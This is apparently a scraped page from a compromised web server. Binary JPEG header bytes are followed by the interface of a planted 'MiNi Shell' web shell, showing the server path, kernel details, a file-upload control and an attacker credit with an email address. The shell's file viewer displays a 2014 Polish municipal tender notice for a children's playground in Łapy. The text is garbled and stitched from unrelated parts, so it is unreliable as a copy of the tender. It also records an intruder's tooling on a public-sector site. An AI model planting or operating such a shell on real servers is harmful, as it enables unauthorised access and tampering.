JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/147370-N-2014.html

<p class="kh_header"><b>Łapy: Budowa placu zabaw wraz z zagospodarowaniem terenu w Łapach Dębowinie na dz. o nr geod. 476/2, gmina Łapy</b><br>
<b>Numer ogłoszenia: 147370 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łapach , ul. gen. Wł. Sikorskiego 24, 18-100 Łapy, woj. podlaskie, tel. 085 7152251, faks 085 7152256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lapy.podlasie.pl, www.bip.lapy.podlasie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placu zabaw wraz z zagospodarowaniem terenu w Łapach Dębowinie na dz. o nr geod. 476/2, gmina Łapy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu zadania pn Budowa placu zabaw wraz z zagospodarowaniem terenu w Łapach Dębowinie na dz. o nr geod. 476/2, gmina Łapy.

Przedmiot zamówienia obejmuje roboty budowlane polegające na:
1. Budowie placu zabaw wraz z zagospodarowaniem terenu obejmujące:
a) wykonanie ogrodzenia terenu,
b) wykonanie utwardzenia placu,
c) wyposażenie placu zabaw,
d) zagospodarowanie terenu (oświetlenie, kosze na śmieci, zieleń)
e) roboty wykończeniowe.

2. Założenia ogólne:
Wszystkie obiekty mają być zrealizowane według norm Unii Europejskiej EN 1176 - 1:1998 - Place zabaw dla dzieci Wymogi bezpieczeństwa i sposoby testowania, których polskim odpowiednikiem jest norma PN-EN 1176-1 Wyposażenie placów zabaw. Część 1; Ogólne wymagania bezpieczeństwa i metody badań.
Place zabaw muszą posiadać deklaracje zgodności, czyli dokumenty potwierdzające, iż produkty są zgodne z w/w normami.

3. Zastosowane materiały
1. Belki nośne mocujące elementy placu zabaw w podłożu powinny być wykonywane z drewna spełniającego wymagania normy EN 350-2 w formie belek bezrdzeniowych. Belki okrągłe o średnicy fi 100 - 120mm, zabezpieczone impregnatami olejowymi, pod warunkiem, że belki drewniane stoją 10cm ponad ziemią na stalowych kątownikach.
2. Pozostałe elementy drewniane, w tym podesty, należy wykonać z drewna akacjowego lub z drewna innych gatunków jako belki bezrdzeniowe, o przekroju okrągłym, zabezpieczonych impregnatami olejowymi.
3. Dopuszcza się wykonanie szczeblin barierek oraz daszków ze sklejki wodoodpornej pomalowanej farbami odpornymi na warunki atmosferyczne.
4. Elementy metalowe należy zabezpieczyć poprzez lakierowanie proszkowo farbami odpornymi na działanie warunków atmosferycznych.
5. Ślizg zjeżdżalni należy wykonać z laminatów na bazie mat z włókien szklanych i żywic poliestrowych lub z blachy ze stali nierdzewnej.
6. Wszystkie elementy drewniane maja być wyszlifowane.
7. Wszystkie stosowane łączniki: śruby, kotwy powinny być ocynkowane.
8. Wszystkie wykorzystane materiały, substancje zabezpieczające, łączniki, sprężyny, łańcuchy i pozostałe połączenia wykorzystywane przy produkcji i montażu muszą posiadać wymagane dopuszczenia i atesty.
9. Wykorzystane materiały powinny być przyjazne dla środowiska i nadawać się do ponownego użycia (recycling) lub odzysku energii (np. spalanie drewna). 

4. Nawierzchnia terenu placu zabaw.
Przed montażem urządzeń należy wyrównać i zniwelować teren.
Po zakończeniu robót należy zasadzić trawę oraz wykonać nasadzenia roślinnością niską ozdobną.

5. Montaż.
Montaż należy wykonać zgodnie z normami bezpieczeństwa i sztuką budowlaną. 
Elementy urządzeń placu zabaw dostarczone w elementach należy skręcać na miejscu, mocować w gruncie za pomocą metalowych kotew posadowionych na głębokości 70-80cm i zalewanych betonem C16/20.
Dopuszcza się mocowanie w gruncie piaskownic poprzez zabetonowanie elementów drewnianych, natomiast bujaków sprężynowych poprzez zasypanie ziemią metalowych kotew mocujących.
Każde urządzenie powinno być instalowane na minimalnym obszarze wymaganym dla danego urządzenia z zachowaniem strefy bezpieczeństwa podanym w opisie urządzenia (ok. 1,5m od obrysu urządzenia).
Należy zachować bezpieczną odległość między urządzeniami i innymi trwałymi elementami placu zabaw, które wyznaczane są przez strefę bezpieczeństwa danego urządzenia.
Po montażu nie należy użytkować urządzeń przez 48 godz. do czasu utwardzenia stóp betonowych.
Przed oddaniem placu zabaw do użytkowania należy sprawdzić kompletność instalacji oraz stabilność urządzeń.

6. Zestawienie urządzeń placu zabaw:LEGENDA:
1. Komplet zabawowy
2. Komplet zabawowy
3. Komplet zabawowy
4. Komplet zabawowy
5. Pomost z belką
6. Ścianka gimnastyczna
7. Przeplotnia łańcuchowa ze słupkiem
8. Rower
9. Konik 
10. Słonik
11. Huśtawka
12. Piaskownica
13. Lokomotywa z wagonem
14. Huśtawka równ. ważka
15. Huśtawka podwójna
    - Ławki - 7szt.	
    - Kosz na śmieci - 7szt.

7. Ogrodzenie:
Projektowane ogrodzenie panelowe łącznie z fundamentem dookoła działki z profili stalowych systemowych. Panele przetłaczane o wymiarach 1,23x2,5 m z drutu min. 
O 4,0 mm, słupki z kształtowników stalowych o długości 2,0 m z obejmami do montowania na każdy słup, podwalina betonowa zbrojona i wibroprasowana o wymiarach 0,2x2,49m, element betonowy pod słupy o wys. 0,2m. Łączna wysokość ogrodzenia min. 1,45m o łącznej długości 210,55m.

8. Utwardzenie miejsc postojowych dla samochodów osobowych.
W ramach budowy będą wykonywane następujące nawierzchnie:  nawierzchnia z betonowej kostki brukowej gr. 8cm. na projektowanych miejscach postojowych. Miejsca postojowe zostaną tak ukształtowane wysokościowo, żeby nie naruszyć dotychczasowego ukształtowania terenu oraz kierunku spływu wód powierzchniowych na własną działkę. Miejsca postojowe zostaną obramowane opornikiem betonowym 15x30 w celu umożliwienia odprowadzenia wód opadowych powierzchniowo na teren działki. 
Konstrukcja nawierzchni została określona w oparciu o Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 02 marca 1999 r.   w  sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie,
Konstrukcja nawierzchni parkingu oraz drogi dojazdowej:
a) kostka betonowa brukowa - 8cm
b) podsypka cementowo - piaskowa 1:4 - 3cm
c) podbudowa zasadnicza z kruszywa łamanego stab. Mech.- 25cm
Oporniki betonowe:
a) opornik  betonowy typu lekkiego	-15x30cm
b) podsypka cementowo - piaskowa 1:4 -5cm
c) ława betonowa - C12/15

9. Wykonanie linii kablowej nN 0,4 kV do celów oświetlenia ulicznego placu zabaw oraz oświetlenia (montaż słupów i opraw oświetleniowych). 

10. Wszystkie roboty budowlano-montażowe, a także odbiór robót należy wykonać zgodnie z warunkami technicznymi wykonania i odbioru robót budowlano-montażowych wydanych przez Ministerstwo Gospodarki Przestrzennej i Budownictwa, a opracowanych przez Instytut Techniki Budowlanej.

11. Oferowany sprzęt musi być sprzętem fabrycznie nowym, nie użytkowanym (również do prezentacji) - rok produkcji 2013 lub nowszy.

12. Szczegółowy zakres przedmiotu zamówienia określa dokumentacja projektowa stanowiąca rozdział III SIWZ  opracowana w 2012 roku przez Biuro Projketowe Maciej Pieróg z Łap. Dane techniczne: gabaryty, geometria i lokalizacja elementów oraz projektowane rodzaje materiałów zawiera ww. dokumentacja projektowa. Szczegółowe wymagania dotyczące realizacji robót branżowych zostały określone również w specyfikacjach technicznych wykonania i odbioru robót stanowiących rozdział III niniejszej SIWZ. Wykonawca jest zobowiązany wykonać pełny zakres robót, który jest konieczny z punktu widzenia Dokumentacji Projektowej stanowiącej rozdział III SIWZ, przepisów prawa, wiedzy technicznej i sztuki budowlanej, dla uzyskania finalnego efektu określonego przedmiotem zamówienia, a więc wykonać zadanie bez względu na występujące trudności, jakie mogą wystąpić w trakcie realizacji.

13. Zamawiający dopuszcza rozwiązania równoważne m.in. przyjmując, że pojęcie równoważności nie musi oznaczać tożsamości produktów o ile wykonawca jest w stanie tak zrealizować zamówienie, by zaspokoić wszystkie wymagania  zamawiającego, jakościowe, mimo skorzystania z innych produktów lub materiałów. 
Na wykonawcy ciąży obowiązek wykazania, że oferowane przez niego roboty i dostawy spełniają wszystkie wymagania określone przez Zamawiającego w przekazanej dokumentacji projektowej. Nie określa się, za pomocą jakich dowodów wykonawca ma wykazać, że jego rozwiązania są równoważne, a więc wybór dowodów leży po stronie wykonawcy.  Zamawiający wraz z Inspektorem Nadzoru oceni, czy zaproponowane rozwiązania spełniają Wymagania określone w SIWZ oraz przekazanej  dokumentacji projektowej stanowiącej rozdział III SIWZ w terminie 7 dni od dnia zaproponowania przez Wykonawcę wyżej opisanej równoważności.

14. Wszelkie materiały związane z prawidłowym i pełnym wykonaniem przedmiotu zamówienia zabezpiecza Wykonawca na własny koszt.
15. Wykonawca winien uwzględnić w cenie oferty koszty związane z: 
- wytyczeniem i prowadzeniem prac geodezyjnych w trakcie realizacji przedmiotu umowy oraz dokonaniem geodezyjnych pomiarów powykonawczych i sporządzeniem związanej z tym dokumentacji, zgodnie z przepisami prawa geodezyjnego i kartograficznego, 
- ze zużyciem wody i energii elektrycznej, 
- utrzymaniem placu budowy, 
- ubezpieczeniem budowy, 
- wykonaniem zabezpieczenia terenu robót (oznakowanie i utrzymanie porządku w trakcie robót), 
Wszelkie inne koszty mogące wyniknąć w trakcie realizacji przedmiotu zamówienia w celu jego prawidłowego i pełnego zrealizowania leżą po stronie Wykonawcy. 

16. W ramach wykonania zadania (przedmiotu umowy) Wykonawca udzieli gwarancji na dostarczony sprzęt i wykonane roboty, stanowiące przedmiot niniejszego zamówienia na okres 60 miesięcy licząc od daty ostatecznego bezusterkowego odbioru całego zadania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.21.40-9, 45.11.27.20-8, 45.11.27.23-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunku na podstawie art. 22 ust. 1 pkt. 1-4</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem w wykonaniu  w okresie ostatnich 5 lat, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 2 robót budowlanych odpowiadających swoim rodzajem i wartością przedmiotowi  niniejszego zamówienia, tzn. polegające na budowie placu zabaw wraz z zagospodarowaniem terenu o wartości brutto nie  mniejszej niż 70 000,00 zł każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunku na podstawie art. 22 ust. 1 pkt. 1-4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się doświadczeniem zawodowym    odpowiednim do funkcji, jakie zostaną im powierzone.
Wykonawca przedstawi w ofercie kandydatów na następujące stanowiska:
1. Kierownik budowy - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, który pełnił funkcję kierownika budowy przy min. 2 robotach 
2. Kierownik budowy lub robót elektrycznych - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, który pełnił funkcję kierownika budowy lub robót przy min. 2 robotach. 
3. Kierownik budowy lub robót drogowych - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, który pełnił funkcję kierownika budowy lub robót przy min. 2 robotach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunku na podstawie art. 22 ust. 1 pkt. 1-4</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian postanowień zawartej umowy w zakresie terminu wykonania zamówienia, w przypadku:
a)	braku dostępu do obszarów, w których wykonywane są prace objęte zamówieniem z przyczyn niezależnych od Wykonawcy (przesunięcie terminu może nastąpić wyłącznie o czas równy ilości dni braku dostępu do obszarów, w których wykonywane są usługi)  ;
b)	braku dostępu do mediów (np. awarie w dostawach energii elektrycznej, wody czy innych mediów niezbędnych do wykonania przedmiotu umowy) z przyczyn niezależnych od Wykonawcy- przesunięcie terminu może nastąpić wyłącznie o czas równy ilości dni trwania awarii powodującej brak dostępu do mediów;
c)	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, na czas jej działania uniemożliwiającego wykonywanie zamówienia,
d)	z powodu działań osób trzecich uniemożliwiających wykonanie zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze stron - wyłącznie na okres uniemożliwienia Wykonawcy wykonywania zamówienia.
e)	Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lapy.podlasie.pl, www.bip.lapy.podlasie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 18-100 Łapy, ul. Gen. Wł. Sikorskiego 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2014 godzina 09:30, miejsce: 18-100 Łapy, ul. Gen. Wł. Sikorskiego 24, pokój 103 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest realizowany w ramach działania Odnowa i rozwój wsi objętego PROW na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com